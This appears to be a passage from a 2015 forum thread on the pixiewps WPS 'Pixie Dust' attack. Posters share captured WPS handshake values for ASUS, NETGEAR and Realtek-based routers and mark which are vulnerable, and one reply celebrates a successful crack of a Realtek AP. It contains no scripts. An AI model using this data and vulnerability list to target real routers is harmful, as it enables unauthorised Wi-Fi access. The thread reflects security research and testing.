[P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb :68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b 3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e: f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6 :bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:d b:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7: 82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3 :7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:5 3:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb: a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e :18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:d f:38:d1:2b:71:d4:3e:3e:cc
[P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6 :65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
[P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3 :19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
[P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b :f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94

NOT VULNERABLE:




NETGEAR WN3100RP (WiFi-Repeater)

[P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
[P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44 :67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c 8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6: be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f :d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1 a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53: 95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3 :03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7 b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c: 2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31 :90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:a d:38:01:14:79:2d:bb:6e:90
[P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71 :a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:0 9:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04: b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37 :48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:e f:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b: 7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee :1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:1 8:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74: 0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc :47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:6 0:60:96:dc:d0:a2:10:f9:71
[P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8 :76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
[P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90 :08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
[P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61 :a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79


VULNERABLE:

NETGEAR JNR3210
Realtek RTL8198

[P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc :56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:b b:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe: ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f :75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:2 2:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f: 04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96 :c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:6 5:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80: 13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09 :51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:f f:87:81:59:02:97:0f:f3:0d
[P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17 :a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
[P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb :0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
[P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6 :a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73

soxrok2212
2015-04-20, 15:21
Some new Signatures (tested with all 4 possible pixiewps option-combinations)

NOT VULNERABLE:


ASUS RT-N66U
Broadcom BCM4706

[P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
[P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86 :c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1 c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48: 01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5 :78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:a b:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78: 17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18 :97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d 7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5: 07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b :2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4 d:47:4a:b2:59:6a:3e:43:9b
[P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb :68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b 3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e: f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6 :bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:d b:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7: 82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3 :7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:5 3:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb: a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e :18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:d f:38:d1:2b:71:d4:3e:3e:cc
[P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6 :65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
[P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3 :19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
[P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b :f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94

NOT VULNERABLE:




NETGEAR WN3100RP (WiFi-Repeater)

[P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
[P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44 :67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c 8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6: be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f :d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1 a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53: 95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3 :03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7 b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c: 2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31 :90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:a d:38:01:14:79:2d:bb:6e:90
[P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71 :a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:0 9:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04: b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37 :48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:e f:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b: 7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee :1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:1 8:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74: 0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc :47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:6 0:60:96:dc:d0:a2:10:f9:71
[P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8 :76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
[P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90 :08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
[P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61 :a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79


VULNERABLE:

NETGEAR JNR3210
Realtek RTL8198

[P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc :56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:b b:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe: ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f :75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:2 2:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f: 04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96 :c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:6 5:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80: 13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09 :51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:f f:87:81:59:02:97:0f:f3:0d
[P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17 :a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
[P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb :0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
[P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6 :a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73

Sweet thanks! I see you found Realtek AP and had success!! Congrats!